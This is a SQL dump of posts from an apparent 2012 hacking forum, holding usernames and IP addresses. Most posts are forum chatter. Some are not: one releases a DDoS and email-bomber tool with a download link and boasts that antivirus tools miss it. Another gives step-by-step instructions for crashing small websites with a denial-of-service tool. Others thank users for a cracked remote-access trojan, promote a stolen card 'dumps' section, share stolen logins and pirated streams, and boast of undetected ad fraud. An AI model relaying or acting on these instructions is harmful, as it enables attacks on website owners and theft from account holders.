 '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '670b60c612b82251ff3082c8f81eee2e', '0', '0'); INSERT INTO mybb_posts VALUES('6403', '1088', '6383', '49', 'RE: Best unique and useful suggestion', '0', '5', 'Timmy', '1351217177', '[quote=\'iTzIpod\' pid=\'6383\' dateline=\'1351197922\']\r\nI don\'t really like the idea. \r\n\r\nKinda like the Off Topic Section.\r\n[/quote]\r\n\r\nYes but this will be for tutorials.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3c91cbafd6905a278be08e361c3295b8', '0', '0'); INSERT INTO mybb_posts VALUES('6404', '1090', '6329', '8', 'RE: What is this song called?', '0', '5', 'Timmy', '1351217250', 'Not black and yellow. It\'s a new song i think,', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0a7eb9473145c0f89d0a386452476ae7', '0', '0'); INSERT INTO mybb_posts VALUES('6405', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '1', 't3h jok3r', '1351217319', '0/10 because no one on this thread got 0 and you are unique ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e2673cfd7ffd10183ab0b17f81b8ea81', '0', '0'); INSERT INTO mybb_posts VALUES('6406', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '8', 'spacefish36', '1351217420', 'i learned a lot today thanks timmy', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bc1b251cfe95eb6e4c2f5eb700437ca2', '0', '0'); INSERT INTO mybb_posts VALUES('6407', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '8', 'spacefish36', '1351217464', 'OMG thanks for this, i really really needed this', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e69f09dcb7d16e4f5acff24a5118669d', '0', '0'); INSERT INTO mybb_posts VALUES('6408', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351217544', '10/10 because its the greatest admin ever :P', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '2ed732a8ec5356cdca296d37b3949c9e', '0', '0'); INSERT INTO mybb_posts VALUES('6409', '1101', '0', '49', 'Dumps Section', '0', '8', 'spacefish36', '1351217673', 'I think we should have a dumps section', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'eaf3f79ec0048f606bff5420459056d0', '0', '0'); INSERT INTO mybb_posts VALUES('6410', '1096', '6357', '7', 'RE: Leaked e-book Pack [Lot\'s of stuff]', '0', '257', 'XxTREYZxX', '1351217686', 'Dont worry guys (thread closed)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '5e3f1be66c4c8dfc365ba0ebf3a4bbac', '0', '0'); INSERT INTO mybb_posts VALUES('6411', '1091', '6408', '56', 'RE: Rate the avatar above you', '0', '8', 'spacefish36', '1351217739', '[quote=\'XxTREYZxX\' pid=\'6408\' dateline=\'1351217544\']\r\n10/10 because its the greatest admin ever :P\r\n[/quote]\r\n\r\ncan he get the ass kisser award?\r\n\r\n6/10 nice guy and active', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'fd8853a2b1e883fe8fe81790b9f7fd48', '0', '0'); INSERT INTO mybb_posts VALUES('6412', '1102', '0', '69', 'What kinds of programs have you coded before', '0', '8', 'spacefish36', '1351218025', 'Does the title say it all? Yebo', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'edf3c6190335327dac2d6beecab757c0', '0', '0'); INSERT INTO mybb_posts VALUES('6413', '1103', '0', '3', 'Movie & TV RIPs, Streams etc', '0', '1', 't3h jok3r', '1351218130', 'Movie & TV RIPs, Streams etc section is now public. Everyone can view and post in it without upgrading or requiring a password.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '818341e106d39710ac299cb182715706', '0', '0'); INSERT INTO mybb_posts VALUES('6414', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351218244', '0/10 because you dont have one', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '5d21f85b31a30b72bab71443bda72972', '0', '0'); INSERT INTO mybb_posts VALUES('6415', '1101', '6409', '49', 'RE: Dumps Section', '0', '82', 'iTzIpod', '1351218311', 'Should have it in the Upgraded Section though :)\n\nI agree.\n+1.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d3dcd2b03672759d5e9c91f2ee329a2', '0', '0'); INSERT INTO mybb_posts VALUES('6416', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351218398', '0/10.\nThat avatar\'s too common. I don\'t like it too. \nIt\'s annoying :p\n\n\n-------', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f94b03b892e805200fe434768fc0ffe9', '0', '0'); INSERT INTO mybb_posts VALUES('6417', '1103', '6413', '3', 'RE: Movie & TV RIPs, Streams etc', '0', '82', 'iTzIpod', '1351218438', 'Nice update t3h jok3r! :)\n\nI miss JakeUS. Any sign on what happened to him?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5f2dcc383717f172a73e446ef0ce395b', '0', '0'); INSERT INTO mybb_posts VALUES('6418', '1104', '0', '64', 'The raise of the apes (2011) movie rip available here', '0', '9', 'p420', '1351218445', 'Description: \r\nAn origin story set in present day San Francisco, where man\\\'s own experiments with genetic engineering lead to the development of intelligence in apes and the onset of a war for supremacy..\r\n\r\nRating: 9.2/10 (1045 votes)\r\n\r\nGenre: Action , Thriller , Drama , Sci-Fi\r\nRelease: 5 August 2011\r\nLength: 105 min \r\nViews: 0 (1405 votes)\r\n\r\nLinks\r\n\r\nhttp://hqvideo.cc/pc/4d859c83163310cd/\r\nhttp://fleon.me/vv.php?Id=a8113cd7206f307dbe7060542347af06\r\nhttp://streamme.cc/pc/1c34ad4f19909c10/\r\nhttp://skylo.me/rc.php?Id=de7b0407a00e10d48b04c20be8581854', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3ba0434b53f94927117ce11fee436702', '0', '0'); INSERT INTO mybb_posts VALUES('6419', '1101', '6409', '49', 'RE: Dumps Section', '0', '257', 'XxTREYZxX', '1351218480', 'Yeah this is a good idea \nmate :O', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'cc744954e9a35c64954fd046ac337a5b', '0', '0'); INSERT INTO mybb_posts VALUES('6420', '1103', '6413', '3', 'RE: Movie & TV RIPs, Streams etc', '0', '9', 'p420', '1351218494', 'Thanks i just posted a thread in that sectoin.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3df990279891edf7bb742f9a481fc11f', '0', '0'); INSERT INTO mybb_posts VALUES('6421', '1073', '6241', '64', 'RE: Free Premium Netflix logins', '0', '82', 'iTzIpod', '1351218532', 'I don\'t think you can stream with these since it leads you to the YourAccount page.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '105a20ddc2d24148476c9df0f7c1cbd0', '0', '0'); INSERT INTO mybb_posts VALUES('6422', '1039', '5984', '61', 'RE: Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '9', 'p420', '1351218606', 'Thank you but is this guide helpful?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ea485bc5d81ccf413f6c47579142c880', '0', '0'); INSERT INTO mybb_posts VALUES('6423', '1101', '6409', '49', 'RE: Dumps Section', '0', '9', 'p420', '1351218726', 'Nice idea but maybe free?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '920200c1b6ea61ddb13d56740994216b', '0', '0'); INSERT INTO mybb_posts VALUES('6424', '994', '5596', '18', 'RE: Getting IP\'s of Facebook contacts! [TUT]', '0', '9', 'p420', '1351218811', 'Nice layout and is this saturated?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'be368491212fbb503aad9158ca5ad5af', '0', '0'); INSERT INTO mybb_posts VALUES('6425', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '205', 'mothered', '1351225104', 'Goodness, I\'d hate to see my result!\r\n\r\nAnyhow, I like the one above me, so 8.5/10.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ddce7726dc436e9d6d71bf8be6503f4c', '0', '0'); INSERT INTO mybb_posts VALUES('6426', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '205', 'mothered', '1351225253', 'My work has restricted sites, and running Guest accounts.\r\n\r\nUnless I delve Into getting permissions, It\'s not really worth It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b1c344a314527d35df774dfdce4ca6d1', '0', '0'); INSERT INTO mybb_posts VALUES('6427', '1105', '0', '24', 'Windows 8 Officially released 26-10', '0', '205', 'mothered', '1351225585', 'Greetings everyone,\r\n\r\nDepending on your locality with the time difference, some of you may have Windows 8 officially released based where you are.\r\n\r\nThat\'s the case with myself, but I\'ve had the RTM version activated and running since 2 months ago. I never pay for software, but that\'s just me.\r\n\r\nSo paid or not, will you guys make the switch to Windows 8?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0f9d5ebc479c23ff7bb7d63207dc0b54', '0', '0'); INSERT INTO mybb_posts VALUES('6428', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351228729', 'Kinda boring so 5/10\nso yeah', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '4b94f6abddb5528a4a7ee16c5b247b64', '0', '0'); INSERT INTO mybb_posts VALUES('6429', '1101', '6409', '49', 'RE: Dumps Section', '0', '222', 'Exposé', '1351235882', 'Yeh we have a dumps section in the premium section...it\'s called Premium Accounts...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '92cc9c9d4e08c4959a92086bd9574a18', '0', '0'); INSERT INTO mybb_posts VALUES('6430', '1106', '0', '49', 'Halloween Logo?', '0', '222', 'Exposé', '1351235974', 'Should L33tHacking have a Halloween logo due to the upcoming holiday? Just a suggestion :p', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '17a30757f033893cfdfd5fddec2df026', '0', '0'); INSERT INTO mybb_posts VALUES('6431', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '257', 'XxTREYZxX', '1351236370', 'This would be nice and cool,and spooky :S', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '2cb697932a3b1ecbcb133a231461a3fe', '0', '0'); INSERT INTO mybb_posts VALUES('6432', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '62', 'R?????zo?', '1351237713', 'I already tried this but it didn\'t turn out good, you can try if you want though.', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', 'bd214bdcf78e2409f6b12fd70a3f40a4', '0', '0'); INSERT INTO mybb_posts VALUES('6433', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '257', 'XxTREYZxX', '1351237955', 'I agree mate thanks i will not use these neither i have ever used these', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '3911741c56100e926f0c3c9e68fa8de1', '0', '0'); INSERT INTO mybb_posts VALUES('6434', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '62', 'R?????zo?', '1351238006', 'My password is not there hehe, nice list.', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', '0f39e1ae9ec8577e911117dadf61b6e9', '0', '0'); INSERT INTO mybb_posts VALUES('6435', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '257', 'XxTREYZxX', '1351238599', 'Mine is ahah no its not i am just plating with you, or am i.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '39061564f40098ddebd2bf6432b1fb0c', '0', '0'); INSERT INTO mybb_posts VALUES('6436', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '228', 'VirtualLegend', '1351241181', 'You got that idea from Leakforums right?\n\nReload Maybe if you see the logo of leakforums you will get a idea :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '34bcc020744dd71eae9f7acf9c0b2d09', '0', '0'); INSERT INTO mybb_posts VALUES('6437', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351241605', 'Both of you are accepted, Welcome to Marketers Bro\'s', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e619c16114647ac05cfe1b43d67fc750', '0', '0'); INSERT INTO mybb_posts VALUES('6438', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '228', 'VirtualLegend', '1351241711', 'I hate Cats, just kidding 6/10', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e498808b7e153e33a870707625d76430', '0', '0'); INSERT INTO mybb_posts VALUES('6439', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '228', 'VirtualLegend', '1351241855', 'lmao My password is 0000 but in a diffrent order :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6187b8f39e7425f9112c0602b8a70633', '0', '0'); INSERT INTO mybb_posts VALUES('6440', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351243860', '7/10 because its colurfull and cool aaha', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '913bcd1a66b94aa0bfa2ed2c0284dd55', '0', '0'); INSERT INTO mybb_posts VALUES('6441', '1107', '0', '15', 'Free] = DecFlooder v1.00 = [Free]', '0', '257', 'XxTREYZxX', '1351249473', 'DecFlooder v1.00\n\n\n\nFeatures:\n\nFlooder:\n• DDoS\n• Email Bomber\n• Chat Spammer\n\n\nViruscan:\n\nhttps://www.virustotal.com/file/92fdaf05...350852503/\n\n\n\n\nSHA256: 92fdaf05ea1081f76bd7f1f661f63b8c1ecbe92017b68d577cd07ab1263c4786\nFile name: DecFlooder v1.00.exe\nDetection ratio: 0 / 42\nAnalysis date: 2012-10-21 20:48:23 UTC ( 53 minute ago ) \n00\nMore details\nAnalysis\nComments\nVotes\nAdditional information\nAntivirus Result\n\n\nAgnitum - \nAntiVir - \nAntiy-AVL - \nAvast - \nAVG - \nBitDefender - \nByteHero - \nCAT-QuickHeal - \nClamAV - \nCommtouch - \nComodo - \nDrWeb - \nEmsisoft - \neSafe - \nESET-NOD32 - \nF-Prot - \nF-Secure - \nFortinet - \nGData - \nIkarus - \nJiangmin - \nK7AntiVirus - \nKaspersky - \nKingsoft - \nMcAfee - \nMcAfee-GW-Edition - \nMicrosoft - \nMicroWorld-eScan - \nNorman - \nnProtect - \nPanda - \nPCTools - \nRising - \nSophos - \nSUPERAntiSpyware - \nTheHacker - \nTotalDefense - \nTrendMicro - \nTrendMicro-HouseCall - \nVBA32 - \nVIPRE - \nViRobot -\n\nDownload:\n[lock]http://www.mediafire.com/?51nzp7h6n8o6mmc[/lock]\n\nCredits:\n\nTo me[NonStOp_] for making the flooder.\nYTViews v1.00[Made By Me]\n\n\nDecFlooder v1.00[Made By Me]\n\n[/color]', '203.104.11.14', '-882373874', '1', '0', '1', '1352010907', '1', 'd7fb16404842bd1379dd6e9e5e817921', '0', '1352010907'); INSERT INTO mybb_posts VALUES('6442', '1108', '0', '12', 'How to Crash Small Websites', '0', '257', 'XxTREYZxX', '1351250715', 'leaked so yeah\r\n\r\n[color=#32CD32]How to Crash Small Websites\r\n\r\n\r\nTOOLS REQUIRED :\r\n\r\n\r\nPort Scanner : Click Here To Download\r\nrDos : Click Here To Download\r\n\r\n\r\nStep One: First we need to find the websites IP Adress. This is very easy todo.\r\n\r\nOk so say they URL is http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type pinghttp://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /\'s).\r\n\r\nEXAMPLE:\r\n\r\n\r\n\r\n\r\n\r\nStep Two: Now we must test to see if port 80 is open (it usually is).\r\n\r\nThis is very easy todo to Ok open up the port scanner you downloaded.\r\nOnce in the port scanner type in your Victims ip that you got from step 1.\r\nIt will ask you to do a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y. \r\n\r\n[X] = Closed\r\n[X] Vulnerable = Open\r\n\r\nStep Three:\r\nThe final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)\r\nIf port 80 is open your on your way to crashing!!\r\n\r\nOk open Up rDos that you download.\r\nEnter the ip that we got from step 1.\r\nIt will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.\r\nHit enter.. *= Flooding -=Crashed Or didn\'t connect!\r\n\r\nEXAMPLE:\r\n\r\n\r\n\r\nThe site won\'t be directly offline!!\r\nit starts with ***********\r\nbe patiend.. after some time it will go like this: **********-----------\r\n\r\nThis means the site crashed.[/color]', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '15519f4679055383ca97343665cb205a', '0', '0'); INSERT INTO mybb_posts VALUES('6443', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351252514', '4/10.\nI like Minecraft! :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b6742841c62fea76c7a1992881f161fd', '0', '0'); INSERT INTO mybb_posts VALUES('6444', '1103', '6413', '3', 'RE: Movie & TV RIPs, Streams etc', '0', '205', 'mothered', '1351252899', 'I believe this Is a good move.\r\n\r\nIt\'ll keep posts and activity happening.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '55e5a5ef6797c704312cf2e00bfc1678', '0', '0'); INSERT INTO mybb_posts VALUES('6445', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '205', 'mothered', '1351253080', 'Yet, so many people use passwords like these. Unbelievable.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd9454dc8cb86e9d271eb3c2872dc065b', '0', '0'); INSERT INTO mybb_posts VALUES('6446', '1101', '6409', '49', 'RE: Dumps Section', '0', '61', 'NXK', '1351253187', 'We already have one for premium users only. If you\'d like to check it out feel free to upgrade :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '10a6aafe0f26b522e8f81562b3071985', '0', '0'); INSERT INTO mybb_posts VALUES('6447', '1084', '6311', '4', 'RE: hey guys', '0', '61', 'NXK', '1351253318', 'Welcome, Please try to stay HQ and Enjoy it here :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f974a83ab77d27b6b3b0484c8558d80a', '0', '0'); INSERT INTO mybb_posts VALUES('6448', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '67', 'HoverCatz', '1351254102', 'Coding Minecraft 2d .', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '5aab9e0d4f19fa1094b5322c184e4b0e', '0', '0'); INSERT INTO mybb_posts VALUES('6546', '1118', '6538', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1351455359', '[quote=\'iTzIpod\' pid=\'6538\' dateline=\'1351435065\']\r\nVOUCH. :)\r\n[img]http://i.imgur.com/y7OK1.png[/img]\r\n\r\nThanks sirchamp.\r\nWill you ever consider releasing the program to the public or whatever you\'re using?\r\n[/quote]\r\nNot anytime soon. Because the more that do it the more likely it is to be detected. I have had 2 payouts so far without getting banned. I hope it\'ll stay undected for a while :D', '102.161.228.158', '1721885854', '1', '0', '0', '0', '1', '1e6a18043e1b8a3adb4716e7b6facbf1', '0', '0'); INSERT INTO mybb_posts VALUES('6450', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351254985', '7/10 because your a ipod haha ;o', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', 'd6639a3c75077a99c94df4ff0ea34f21', '0', '0'); INSERT INTO mybb_posts VALUES('6451', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '62', 'R?????zo?', '1351256592', 'Yeah I\'ve seen leakforums logo but I won\'t be doing any halloween logo for LH, I\'m really busy with my job now so I won\'t have time.', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', 'c5f2942612d33538e91dc7c4ee37c762', '0', '0'); INSERT INTO mybb_posts VALUES('6452', '1099', '6401', '16', 'RE: Box Method and Drop Explained', '0', '62', 'R?????zo?', '1351256687', 'Looks good for beginners, thanks for that :)', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', '340e8cb42338b715ab7c6ef81a2fc92c', '0', '0'); INSERT INTO mybb_posts VALUES('6453', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '62', 'R?????zo?', '1351256820', '1/10 for your avatar\nI like your sig though 9/10 just because it should be smaller :)', '46.189.218.45', '784194093', '1', '0', '0', '0', '1', 'd3b58b4a95b970bb6d0d5c744c00986c', '0', '0'); INSERT INTO mybb_posts VALUES('6454', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '53', 'sirchamp', '1351260555', 'On a normal school day about 2-3 hours. On weekends or other free days up to 10 hours.', '94.2.55.62', '1577203518', '1', '0', '0', '0', '1', '21d38aee967017af8e6b75fcef5a6657', '0', '0'); INSERT INTO mybb_posts VALUES('6455', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '53', 'sirchamp', '1351260587', 'Sit in front of the computer.', '249.106.196.152', '-110443368', '1', '0', '0', '0', '1', 'f83aedd2b23660ff9ea7682ec79c1ced', '0', '0'); INSERT INTO mybb_posts VALUES('6456', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '61', 'NXK', '1351265188', 'I don\'t know if we could get one that would match the theme aha, But if someone wants to give it a try we can see what it looks like.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'c37ae13f48e994ac7959334657265ca8', '0', '0'); INSERT INTO mybb_posts VALUES('6457', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '199', 'Anonymous™', '1351269758', '8/10 Nice avatar R?????zo?.', '85.230.51.25', '1441149721', '1', '0', '0', '0', '1', 'd0a1b1e255d3fbaffb4d38a883120d75', '0', '0'); INSERT INTO mybb_posts VALUES('6458', '1109', '0', '47', 'free vpn', '0', '255', 'sbhshroy2', '1351271375', 'this VPN (Virtual Private Network) is Designed with the latest technologies and most advanced cryptographic techniques to keep you safe on the internet from prying eyes and hackers by securely routing all your internet traffic through an encrypted tunnel to bypass government censorship, defeat corporate surveillance and monitoring by your ISP. VPNBook strives to keep the internet a safe and free place by providing free and secure PPTP and OpenVPN service access for everyone\r\n\r\n\r\n\r\nFeatures\r\nAnonymity, Freedom, Performance, Peace of Mind\r\nBuilt for Performance\r\n\r\nOur VPN servers are built for speed with their own dedicated hardware. You will immediatley notice that our VPN servers are properly optimized to maximize your speed and browsing experience all while maintaining your privacy online.\r\nNo Restrictions\r\n\r\nUnblock any website or service online, we do not block any ports or websites so you can play any games or use any programs and experience the whole of the internet right at your fingertips.\r\nStrongest Encryption\r\n\r\nWe understand how important it is for you to be anonymous and secure. All traffic between you and the VPN is encrypted using only the best encryption techniques such as AES-256, to get an idea, it would take the world\'s fastest supercomputer 1000\'s of years to crack this level of encryption.\r\nNo Bandwidth Limits\r\n\r\nEnjoy unrestricted speed and unlimited traffic, wether you want to watch a movie, download a torrent or run any traffic intensive apps, we do not restrict speed wether you use 1GB or 100GB of bandwidth in a day.\r\nSmart CDN Fallback\r\n\r\nProviding cloud based I.P CDN components that helps our network intelligently route your traffic via the least congested route to maintain overall network integrity, which results in performance improvement for end-users, and the great part is that there\'s still a local fallback in case of CDN failure.\r\n100% Anonymity\r\n\r\nWith governments and ISP\'s world wide now pushing for mandatory data retention and snooping laws, we place our servers strategically in countries where these such laws do not exist (example: Romania, Switzerland), thus we do NOT log any of your internet browsing traffic, all that is logged is your I.P address and time the connection was made, connection logs are automatically removed every 3 day.\r\n\r\nclick here\r\nhttp://adfoc.us/7433111417963', '14.99.62.44', '241385004', '0', '0', '0', '0', '1', 'd3f6b2ac59d6a766190e6ee0e6a0b949', '0', '0'); INSERT INTO mybb_posts VALUES('6459', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '3', '??????????¢™', '1351272008', 'I think we should but not really because we arent that big yet.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '7328c5a94d3aa407828477e47450454b', '0', '0'); INSERT INTO mybb_posts VALUES('6460', '1109', '6458', '47', 'RE: free vpn', '0', '53', 'sirchamp', '1351275258', 'Is this a contest or a giveaway??', '202.209.204.41', '-892220375', '1', '0', '0', '0', '1', 'ebf3f9ec20c5fdb129465f06e67fc840', '0', '0'); INSERT INTO mybb_posts VALUES('6461', '1093', '6341', '7', 'RE: I\'m back', '0', '82', 'iTzIpod', '1351279044', 'Welcome back.\n\nI didn\'t realize you were IP Banned. But welcome back either or.\n\nClose this thread? @t3h jok3r.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c6c202c97531b530993046ff72c4394c', '0', '0'); INSERT INTO mybb_posts VALUES('6462', '1099', '6401', '16', 'RE: Box Method and Drop Explained', '0', '82', 'iTzIpod', '1351279266', 'Very nice explanation! Keep up the HQ Content. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b08107be25986dba862dab249111e80b', '0', '0'); INSERT INTO mybb_posts VALUES('6463', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351279328', '10/10 Looks Unique and Cool also matches your name in a way. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6033bb474caee8ba6f2067dffc3a632b', '0', '0'); INSERT INTO mybb_posts VALUES('6464', '1110', '0', '54', '[27 OKT]Brazzers,Bangbros,Realitykings,...and more WORKING PASSES FOR 27.OKT.2012', '15', '255', 'sbhshroy2', '1351280920', 'http://adfoc.us/7433111419932', '116.203.181.143', '1959507343', '0', '0', '0', '0', '1', '8aa3f370eb5cad90e366cabb11af4dac', '0', '0'); INSERT INTO mybb_posts VALUES('6465', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '53', 'sirchamp', '1351282082', 'HF has also got a halloween logo :D It looks pretty nice. I think we should also have one... We have lots of talented, graphic making guys here.', '44.174.182.174', '749647534', '1', '0', '0', '0', '1', 'b3d1eee99aaaa8dd0fa71ad71ac0436b', '0', '0'); INSERT INTO mybb_posts VALUES('6466', '1111', '0', '54', '[27 oct]huge collection of porn acounts,more than 50 porn sites acount*no download*', '0', '255', 'sbhshroy2', '1351287012', 'http://tny.cz/e396247a\n\nNo more quad spam links.', '116.203.181.143', '1959507343', '0', '0', '61', '1351293761', '1', '7b49658aac081f84e7b1f27494dfa254', '0', '1351293761'); INSERT INTO mybb_posts VALUES('6467', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '222', 'Exposé', '1351303493', 'If someone can give me the psd I can make one up quick...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5b479c239dcc2d87d1755290451437e3', '0', '0'); INSERT INTO mybb_posts VALUES('6468', '1047', '6049', '16', 'RE: Get free Otterbox cases!', '0', '82', 'iTzIpod', '1351303504', 'Update:\nHey Expose, I need help SEing it. \nOr, if only there was some way I can repay you back if you can do it for me?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b485aae45c37f7cf6b01bb66584bdf09', '0', '0'); INSERT INTO mybb_posts VALUES('6469', '1093', '6341', '7', 'RE: I\'m back', '0', '2', 'Apathy', '1351305869', 'I was ip banned as well. Nice to see you back.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '26fc1b42f4351f72f2cfda5e2acafae7', '0', '0'); INSERT INTO mybb_posts VALUES('6470', '1090', '6329', '8', 'RE: What is this song called?', '0', '205', 'mothered', '1351308542', 'This could be anything.\r\n\r\nDo you know any parts of the main chorus?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5d692ff9718c1f3904ff9811c15d2dba', '0', '0'); INSERT INTO mybb_posts VALUES('6471', '1090', '6470', '8', 'RE: What is this song called?', '0', '257', 'XxTREYZxX', '1351309139', '[quote=\'mothered\' pid=\'6470\' dateline=\'1351308542\']\r\nThis could be anything.\r\n\r\nDo you know any parts of the main chorus?\r\n[/quote]\r\n\r\nYes this would be very helpfull\r\nDo you ?', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '9475f72d2805b2bc1612becec3232f6c', '0', '0'); INSERT INTO mybb_posts VALUES('6472', '1112', '0', '49', 'SUGGESTION', '0', '257', 'XxTREYZxX', '1351309406', 'hey LH, whats happening,\r\ni think there should be a thing where you cant -rep till 50 post +2\r\nrep.To stop rep abuse \r\nwho agrees :P', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '638d3d815792a76f3244dbc103c13481', '0', '0'); INSERT INTO mybb_posts VALUES('6473', '1093', '6341', '7', 'RE: I\'m back', '0', '3', '??????????¢™', '1351313219', 'I didnt even notice that he was banned.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '3a746bb0afb371c350cfabf5df696a96', '0', '0'); INSERT INTO mybb_posts VALUES('6474', '1112', '6472', '49', 'RE: SUGGESTION', '0', '258', 'PiXEL^OG', '1351314643', 'Completely useless , there has not been any rep fucks here so there is no need', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '0179ab737918b5cdc4ac6d3e8691fb7f', '0', '0'); INSERT INTO mybb_posts VALUES('6475', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '258', 'PiXEL^OG', '1351314736', 'Actually , why not make a Halloween theme for l33thacking? that would be awesome ^^', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '77661c1833da60a2cb15eb0c0863bc68', '0', '0'); INSERT INTO mybb_posts VALUES('6476', '1113', '0', '54', '[27 0ct]huge collection of premium porn acounts. all checked and working', '17', '255', 'sbhshroy2', '1351315333', 'http://adfoc.us/7433111424432', '14.96.62.29', '241188381', '0', '0', '0', '0', '1', '4d5d7613bab60f2317edf8ccc9738ada', '0', '0'); INSERT INTO mybb_posts VALUES('6477', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '222', 'Exposé', '1351316191', '[img]http://i.imgur.com/3NVH5.png[/img]', '74.76.76.132', '1246514308', '1', '0', '222', '1351316510', '1', '689c77303e99cf3e3757dad30097e0a3', '0', '1351316510'); INSERT 